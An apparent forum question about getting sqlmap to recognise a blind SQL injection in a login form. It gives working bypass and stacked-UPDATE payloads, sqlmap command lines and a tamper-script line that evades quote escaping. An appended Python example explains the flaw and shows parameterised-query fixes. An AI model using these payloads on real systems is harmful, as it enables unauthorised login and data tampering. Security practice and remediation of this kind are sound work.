
I am looking for some help on how to get the best out of sqlmap. I am practising on a web application that runs the following query when the login form is submitted:

SELECT * FROM Users WHERE username = '<form-username-value>' AND passhash = '5baa61e49cb93f3f0682250b6cf8331b7ee68fd8';

The web application substitutes all single quotes in the provided <form-username-value> with backslash + single quote prior to executing the SQL.

Webform injections that work:

\' or 1=1; #

and

\' or 1=1; update Products set name="new-name" where id=346892; #

These are blind injections. I know the stacked SQL commands are working because I can see changes to the rendered text on the website.

Is there a way to let sqlmap know of a working injection and then have it use its blind querying skills to enumerate the database?

I have tried and tried to get sqlmap to recognise this injection because I would like to use its brilliant abilities to pull data out of the database with its time-based queries.

Here are a few commands I've tried:

$ /home/kali/src/sqlmap-dev/sqlmap.py -u 'https://hostname/app/doLogin.action' --data="username=x&password=x" -p username --prefix="'" --suffix=";#" --tamper=escape-and-subst-single-quotes.py --dbms mysql --level=3 --risk=3 --batch --code=301 -v 6

and

$ /home/kali/src/sqlmap-dev/sqlmap.py -u 'https://hostname/app/doLogin.action' --data="username=x&password=x" -p username --prefix="'" --suffix=";#" --tamper=escape-and-subst-single-quotes.py --dbms mysql --level=3 --risk=3 --batch --titles --string='APPNAME' -v 6

and

$ /home/kali/src/sqlmap-dev/sqlmap.py -u 'https://hostname/app/doLogin.action' --data="username=*&password=x" -p username --prefix="'" --suffix=";#" --tamper=escape-and-subst-single-quotes.py --dbms mysql --level=3 --risk=3 --batch --code=301 -v 6

I have created this tamper script (escape-and-subst-single-quotes.py) to put a backslash in front of the first single quote found and change the rest into double quotes. It has the following line of Python:

   return payload.replace("'", '"').replace('"',"\\'",1)

Looking at the sqlmap logs, I'm happy with the queries being sent to the server, and I can see it succeeded with:

[13:01:52] [PAYLOAD] x\' OR 1=1;#

The TRAFFIC OUT shows:

username=x%5C%27%20OR%201%3D1%3B%23&password=x

It seems as though the problem is with sqlmap realising when it has been successful.

If I try that same payload in a web browser, it works and logs me in. The developer tools show the first response to the POST is a 301 with a Location: /app, then there's a 302 GET with Location: /app/, then there's a 200 GET with the logged-in page content.

I've tried many variants of --code=301, --code=302, --string, --not-string, --titles and just can't get it right. I think this is probably the area where I've made a mistake. For instance, I've tried --titles --string="APPNAME", where the logged-in page is the only one that has 'APPNAME' as its title; the login form page has a title of 'Log in', and if there's an SQL error, that page has a title of 'SQL Exception'.

Mark

0 Answers
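Why the backslash-prefixed payload in the question gets past a filter that escapes only single quotes, and what the fix looks like, as an added example in Python (this is not code from the question's application or from sqlmap). It models the escaping the question describes, decodes the resulting string literal with MySQL's rules to show where the database actually ends the username value, then shows a correctly layered escape and a parameterised query. The `naive_escape`, `mysql_escape`, `first_literal` and `login_row` helpers, the Users table and its single row are this example's own; sqlite3 stands in for MySQL in the parameterised query only, since SQLite does not use backslash escapes in literals.

```python
import sqlite3

# Constructed to match the query shown in the question.
PASSHASH = "5baa61e49cb93f3f0682250b6cf8331b7ee68fd8"


def naive_escape(value: str) -> str:
    """The application's filter as the question describes it: only ' is escaped."""
    return value.replace("'", "\\'")


def mysql_escape(value: str) -> str:
    """Escape the way mysql_real_escape_string does (assumed mapping): the
    backslash is escaped as well as the quotes, so a backslash supplied by the
    user can no longer pair up with the backslash the filter adds."""
    table = {
        "\\": "\\\\", "'": "\\'", '"': '\\"',
        "\0": "\\0", "\n": "\\n", "\r": "\\r", "\x1a": "\\Z",
    }
    return "".join(table.get(ch, ch) for ch in value)


def build_query(username_sql: str) -> str:
    """String-concatenated query, exactly the shape the question shows."""
    return ("SELECT * FROM Users WHERE username = '" + username_sql
            + "' AND passhash = '" + PASSHASH + "';")


def first_literal(query: str) -> str:
    """Return the content of the first single-quoted literal in `query`,
    decoded with MySQL's string rules (backslash escapes the next character,
    '' is an embedded quote). Comments are not modelled; the only question
    asked here is where the database thinks the username literal ends."""
    i = query.index("'") + 1
    out = []
    while i < len(query):
        ch = query[i]
        if ch == "\\" and i + 1 < len(query):
            out.append(query[i + 1])
            i += 2
        elif ch == "'":
            if i + 1 < len(query) and query[i + 1] == "'":
                out.append("'")
                i += 2
            else:
                return "".join(out)
        else:
            out.append(ch)
            i += 1
    raise ValueError("unterminated string literal")


def username_survives(escape, value: str) -> bool:
    """True when the whole submitted value stays inside the username literal,
    i.e. the escaping kept the data from becoming SQL."""
    return first_literal(build_query(escape(value))) == value


def login_row(username: str, passhash: str):
    """Parameterised query: the value travels separately from the SQL text, so
    no escaping logic is involved. The table and row are constructed."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (username TEXT, passhash TEXT)")
    con.execute("INSERT INTO Users VALUES (?, ?)", ("alice", PASSHASH))
    row = con.execute(
        "SELECT * FROM Users WHERE username = ? AND passhash = ?",
        (username, passhash),
    ).fetchone()
    con.close()
    return row


if __name__ == "__main__":
    plain = "x' or 1=1; #"      # quote only: the naive filter copes with this
    prefixed = "x\\' or 1=1; #"  # backslash + quote: the payload from the question
    for name, esc in (("naive_escape", naive_escape), ("mysql_escape", mysql_escape)):
        for value in (plain, prefixed):
            q = build_query(esc(value))
            print(f"{name:13} {value!r:20} literal ends as {first_literal(q)!r}"
                  f"  survives={username_survives(esc, value)}")
    print("parameterised, attacker value:", login_row(prefixed, PASSHASH))
    print("parameterised, real user:     ", login_row("alice", PASSHASH))
```

With the naive filter the username literal for the second value decodes to just `x\`: the user's backslash consumes the filter's backslash, the next quote closes the literal, and everything after it is parsed as SQL. Escaping the backslash as well keeps the whole value inside the literal, and the parameterised form removes the question entirely, which is the fix to ask for in the application.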